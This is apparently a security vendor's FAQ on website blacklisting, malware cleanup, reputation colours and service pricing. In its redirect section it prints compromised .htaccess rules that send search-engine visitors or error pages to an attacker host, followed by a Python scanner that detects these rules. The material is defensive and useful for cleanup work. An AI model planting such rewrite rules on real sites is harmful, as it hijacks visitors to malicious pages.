FAQ
We created this Frequently Asked Questions (FAQ) page to answer some of the most common questions we have received. If you don’t see your question answered here, contact us!
What are blacklists?
- Blacklists contain names of websites which have engaged in malicious or annoying activities, such as distributing malware, being an accomplice in a phishing attempt, or hosting annoying or dangerous advertisements.
- A blacklist usually lists the name, or a modified version of the name (such as a hash), of a website.
Why has my site been blacklisted by Google?
- As a public service, Google analyzes websites and determines if the website is distributing malware or has been reported as taking part in a phishing attempt. If your site is listed on Google’s Safe Browsing List, it might have been involved in the distribution of malware (harmful computer programs like viruses).
How do I fix it?
- Clean your website and remove any traces of malware [Detailed Instructions].
- Understand how malware was deposited on your benign website.
- Sign up for website monitoring to prevent it from recurring.
- Request a site review from Google.
How long will it take to get off the blacklist?
- It can take from a few hours to as many as 10 days to get off a blacklist. Some individuals have also reported longer time periods. If your website is on a blacklist, it is imperative that you identify the exact cause of the problem and remedy the situation correctly. A lot of webmasters cannot hunt down all traces of malware and hence stay on the blacklist for quite long.
How can Google do this to me?
- Google is not out to hurt websites and businesses. It is simply providing a public service to Internet users by offering a warning about its opinion regarding the security of your website. A cleaner and safer Internet benefits all web surfers.
No one can access my website, my business is being destroyed!
- Modern browsers like Internet Explorer, Firefox, Opera and Safari all consult some form of blacklist before visiting a website. If your website is listed on a blacklist, chances are that your visitors are not able to get to your website. This may cost you significant revenue and may degrade your reputation.
I did not upload any viruses, where did the malware come from?
- Your website has a vulnerability. Think of it as an open door in your house. The hacker has used this door to enter your website and deposit malicious computer code.
- Your web server has a vulnerability. If you do not host your website yourself, you need to make sure that the web server (computer) which is used to host your website is secure. Even large professional hosting companies have problems. Alternatively, if you host your own website, you can take action now by ordering a Vulnerability to Penetration Assessment.
- Your login credentials have been compromised. Hackers often install programs called keyloggers on computers. These programs record the keystrokes you use to type in your password and username. Once the hacker gathers this information, they can log in to your website silently and wreak havoc. A Web Application Firewall (WAF) will not protect you from this kind of compromise. A website monitoring system will alert you to such a scenario, however.
- Third-party software installations may have vulnerabilities. If your website uses online shopping cart, blogging or forum software from a third party, it may have introduced vulnerabilities into your website, which caused your site to get compromised.
I have Anti-Virus Software on my computer, how could this happen to me?
- Your Anti-Virus software protects your personal computer from threats. It cannot protect your website from attacks by a hacker.
How is your technology better than Anti-Virus?
- Most Anti-Virus systems use signature-based mechanisms. Once a piece of malware has been reported as bad, they will be able to detect it on your computer. We take a different approach. We understand the behavior of a piece of malware and then create a profile for malicious computer code. This allows us to hunt down previously unseen pieces of malware.
Why did a hacker do this to me?
- The chances are that your site was compromised using automated programs which are developed by hackers and sold on the underground black market. It is very rare that a hacker will take a personal interest in infecting a website.
- Automated hacking tools do not discriminate between small or large websites. It does not matter if you own a small business or a very large one, or even if you just host a blog or a personal website. All websites are fair game for these bad guys.
How can I prevent this from occurring again?
- You should subscribe to a website monitoring service in order to be notified in the case of a malware injection.
- You need to assess the security status of your website applications and web server.
- You need to improve the security of your website applications, such as your blogging software, online shopping cart (update applications).
- You need to improve the security of your web server (update server software or operating system).
Who can help me fix this?
- We, stopthehacker.com, can help you out!
- You may also find helpful volunteers here:
Why is my hosting company clueless?
- Web hosting companies face a full gamut of issues they need to handle every day, from customer complaints to billing issues, inquiries and much more. They are not always able to focus on security problems because they don’t have the time or lack the insight of focused security organizations. If you are facing issues and not getting help from your website hosting company, please send us a message; we may be able to get the priority of your case elevated.
Can advertisements on my website cause me to get blacklisted?
- Yes, they can. Hackers can even distribute malicious advertisements to advertisement distribution companies. These ads can find themselves circulated through the digital ecosystem to various benign websites which can cause good websites to get marked as malware distribution points.
My site is PCI certified, am I immune?
- PCI certification is a good first step towards securing your website. Unfortunately, being PCI certified does not ensure immunity to these attacks. PCI certification simply means that the website does follow some best practice guidelines. This does not ensure that a website is immune to code injection attacks, either.
My site has a SSL certificate, I can see a padlock sign, am I immune?
- No. SSL certificates have nothing to do with protection from malware attacks. SSL certificates simply prove that your site is the website it claims to be. It is a sign of a responsible business who wants to confirm their identity to the visitor.
My site has a trustmark, am I safe?
- No. Several companies sell trustmarks. Some trustmarks simply prove that you are a legitimate business, or that you will respect some privacy criteria. Most trustmarks are not related to the security of the website.
Some malware is specific to Internet Explorer, can you detect it?
- Yes, we can detect malware that only triggers when a user browses a site using Internet Explorer. We also use various IP addresses to probe a single website.
- Additionally, we check for malware that triggers when a user visits from search engine web pages like Google, Bing, Yahoo, etc.
When I try to select a service from StopTheHacker, I see a message that says: Your site has 403 pages. My site only has 20 pages. Why do I see this message?
- Your site may have many more publicly accessible web pages or web objects than you think. For example:
- Default pages hosted by your web server.
- PDF files, advertisement files (SWFs) accessible via your site.
- Dynamically generated pages (the URLs that end with something like ?p=120) by your content management system (WordPress) or framework (Django).
The service (e.g. Health Monitoring) is listed as $X/month (starting price) on your website, but when I tried to add the service, I am shown a higher price (e.g. Health Monitoring for $60/month). Why?
- Our service prices are based on the size of your website. For example, Health Monitoring services start from $15/month (per site) for small sites with fewer than 25 pages.
- We suggest that you purchase the level of service that we recommend to you. If you would like to purchase a lower service tier, please contact us.
Why are my customers getting redirected to another website?
- Please try to check your .htaccess file on the webserver. A good resource for this can be found here.
- Also, note that the permissions on the .htaccess file should be 0640/0644. Do not leave this file accessible to everyone.
- A compromised .htaccess file usually has entries that look like:
    RewriteCond /home/sitename/public_html/mailer/incladd.php -f
    RewriteCond %{REQUEST_URI} !incladd.php$
    RewriteCond %{REQUEST_URI} !ca0272.php$
    RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /mailer/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L]

- Another example:

    RewriteEngine On
    ErrorDocument 400 http://evilsite.com/optic/index.php
    ErrorDocument 401 http://evilsite.com/optic/index.php
    ErrorDocument 403 http://evilsite.com/optic/index.php
    ErrorDocument 404 http://evilsite.com/optic/index.php
    ErrorDocument 500 http://evilsite.com/optic/index.php
    RewriteCond %{HTTP_REFERER} .google. [OR]
    RewriteCond %{HTTP_REFERER} .ask. [OR]
    RewriteCond %{HTTP_REFERER} .yahoo. [OR]
    RewriteCond %{HTTP_REFERER} .baidu. [OR]
    RewriteCond %{HTTP_REFERER} .youtube. [OR]
    RewriteCond %{HTTP_REFERER} .wikipedia. [OR]
    RewriteCond %{HTTP_REFERER} .qq. [OR]
    RewriteCond %{HTTP_REFERER} .excite. [OR]
    RewriteCond %{HTTP_REFERER} .altavista. [OR]
    RewriteCond %{HTTP_REFERER} .msn. [OR]
    RewriteCond %{HTTP_REFERER} .netscape. [OR]
    RewriteCond %{HTTP_REFERER} .aol. [OR]
    RewriteCond %{HTTP_REFERER} .hotbot. [OR]
    RewriteCond %{HTTP_REFERER} .goto. [OR]
    RewriteCond %{HTTP_REFERER} .infoseek. [OR]
    RewriteCond %{HTTP_REFERER} .mamma. [OR]
    RewriteCond %{HTTP_REFERER} .alltheweb. [OR]
    RewriteCond %{HTTP_REFERER} .lycos. [OR]
    RewriteCond %{HTTP_REFERER} .search. [OR]
    RewriteCond %{HTTP_REFERER} .metacrawler. [OR]
    RewriteCond %{HTTP_REFERER} .bing. [OR]
    RewriteCond %{HTTP_REFERER} .dogpile. [OR]
    RewriteCond %{HTTP_REFERER} .facebook. [OR]
    RewriteCond %{HTTP_REFERER} .twitter. [OR]
    RewriteCond %{HTTP_REFERER} .blog. [OR]
    RewriteCond %{HTTP_REFERER} .live. [OR]
    RewriteCond %{HTTP_REFERER} .myspace. [OR]
    RewriteCond %{HTTP_REFERER} .mail. [OR]
    RewriteCond %{HTTP_REFERER} .yandex. [OR]
    RewriteCond %{HTTP_REFERER} .rambler. [OR]
    RewriteCond %{HTTP_REFERER} .ya. [OR]
    RewriteCond %{HTTP_REFERER} .aport. [OR]
    RewriteCond %{HTTP_REFERER} .linkedin. [OR]
    RewriteCond %{HTTP_REFERER} .flickr.
    RewriteRule ^(.*)$ http://evilsite.com/optic/index.php [R=301,L]

- Yet another example:

    <ifmodule>
    RewriteEngine On
    RewriteOptions inherit
    RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
    RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
    RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
    </ifmodule>
- Log into your website account using your ftp, sftp, ssh, scp, or cPanel password.
- Once you have access to your website directory, navigate to the main directory where you should be able to see your HTML files (webpages).
- Download all pages and folders to your local computer.
- Use a program like grep, Wingrep, ScanFS, Grppola, or Total Commander to search all the downloaded files for malicious patterns.
- Delete the malicious code. Remember to check your database, templates, .htaccess file and your backups for any copies of the malicious links or code.
- Upload the cleaned files back to your account.
- Then, request a review from Google.
- Scan your local computer with multiple Anti-virus engines.
- Ask your website hosting company for help with this issue, or point them to us.
Sign up for website monitoring and we can help you with this entire process!
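The three kinds of compromised .htaccess entries shown above, and the 0640/0644 permission rule, can be checked mechanically on the downloaded files. The script below is an added example, not StopTheHacker's own tooling; `scan_htaccess`, `too_permissive` and the `own_hosts` allowlist are hypothetical names, and the sample input is constructed from the entries on this page.

```python
import re
import stat
from urllib.parse import urlparse

# Constructed sample modelled on the compromised entries shown above,
# followed by an ordinary CMS front-controller rule that must not be flagged.
SAMPLE = """\
RewriteEngine On
ErrorDocument 404 http://evilsite.com/optic/index.php
RewriteCond %{HTTP_REFERER} .google. [OR]
RewriteCond %{HTTP_REFERER} .bing.
RewriteRule ^(.*)$ http://evilsite.com/optic/index.php [R=301,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule . /index.php [L]
"""

def external(target, own_hosts):
    """True if target is an absolute URL on a host the site owner did not list."""
    url = re.sub(r"^hxxp", "http", target, flags=re.I)  # undo defanged scheme
    if not re.match(r"https?://", url, re.I):
        return False
    host = (urlparse(url).hostname or "").lower()
    return not any(host == h or host.endswith("." + h) for h in own_hosts)

def scan_htaccess(text, own_hosts=()):
    """Return (line_no, reason) findings for the redirect patterns above."""
    findings, referer_cond = [], False
    for no, raw in enumerate(text.splitlines(), 1):
        parts = raw.split()
        if not parts or parts[0].startswith("#"):
            continue
        directive = parts[0].lower()
        if directive == "errordocument" and len(parts) >= 3:
            if external(parts[2], own_hosts):
                findings.append((no, "ErrorDocument points to external site"))
        elif directive == "rewritecond" and len(parts) >= 2:
            referer_cond |= "http_referer" in parts[1].lower()
        elif directive == "rewriterule" and len(parts) >= 3:
            if external(parts[2], own_hosts):
                why = "referer-conditioned" if referer_cond else "unconditional"
                findings.append((no, why + " RewriteRule to external site"))
            elif "%{script_filename}" in parts[2].lower():
                findings.append((no, "RewriteRule feeds requested file to a script"))
            referer_cond = False  # conditions bind only to the next RewriteRule
    return findings

def too_permissive(mode):
    """True if a file mode grants any bit beyond 0644 (e.g. group/world write)."""
    return bool(stat.S_IMODE(mode) & ~0o644)
```

Pass the site's own domains in `own_hosts` so that legitimate redirects to your canonical host are not reported, and feed `too_permissive` the `st_mode` returned by `os.stat` on the server copy of the file.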
What do the colors in the Rating Legend mean?
Our Rating Legend uses a Threat Level color scheme to indicate the severity of site safety and reputation issues.
Why is my site marked Orange or Yellow?
- This color indicates that the site in question is neither “verified” good nor bad.
- The rating is based on a heuristic which checks if the name of the site is similar to a popular “verified” site or not.
- This could suggest typo-squatting.
Why is my site marked Red?
- This color indicates that the site in question has been involved in malicious activity.
- This kind of undesirable behavior ranges from participation in phishing campaigns, spam campaigns, malware distribution and zombie or bot attacks.
Why is my SSL certificate marked Blue?
- This color indicates that your SSL certificate is current and valid. However, your SSL certificate is not an Extended Validation SSL Certificate.
Why is my network reputation marked Orange or Yellow?
- This color indicates that the site in question is hosted on a network which also hosts other malicious websites.
- This gives you an idea of the kind of neighborhood your website resides in.
Why is my host reputation marked Orange or Yellow?
- This color indicates that the site in question is hosted on a web server or is associated with an IP address which potentially hosts other malicious websites.
- If there are a large number of malicious websites hosted on the same server as your website, there could be a server level issue which the web host might need to address.
What can I do to improve my reputation rating?
- Your reputation rating can be improved by getting in touch with us via our contact form.
- We will verify that your website is genuine, not involved in typo-squatting or selling misleading products and services. If we make a positive determination, we will change your website’s reputation to safe or good.
What can I do to improve my host reputation rating?
- Your host reputation rating can be improved by getting in touch with your web hosting company and asking them to migrate your website to a reputable server or IP address.
What can I do to improve my network reputation rating?
- The network reputation rating can be improved by migrating your website to a new ISP or web hosting provider.
My site is listed on Clean-MX, Phishtank, or other blacklists, what should I do?
- You should take remediation steps to remove offending web pages and malware from your website.
- Then, visit the websites of the blacklists which have reported your website: such as clean-mx.de and submit a request for review. If you encounter problems doing this, please contact us.
My Web Of Trust score shows 0/5 or 1/5, what does this mean?
- Your score at Web Of Trust depends on how many Web Of Trust community members rate your site.
- Your score is 1/5 if not many community members have rated your site with a positive reputation.
- To improve your score you can visit Web Of Trust and ask community members to rate your website, increasing your score.


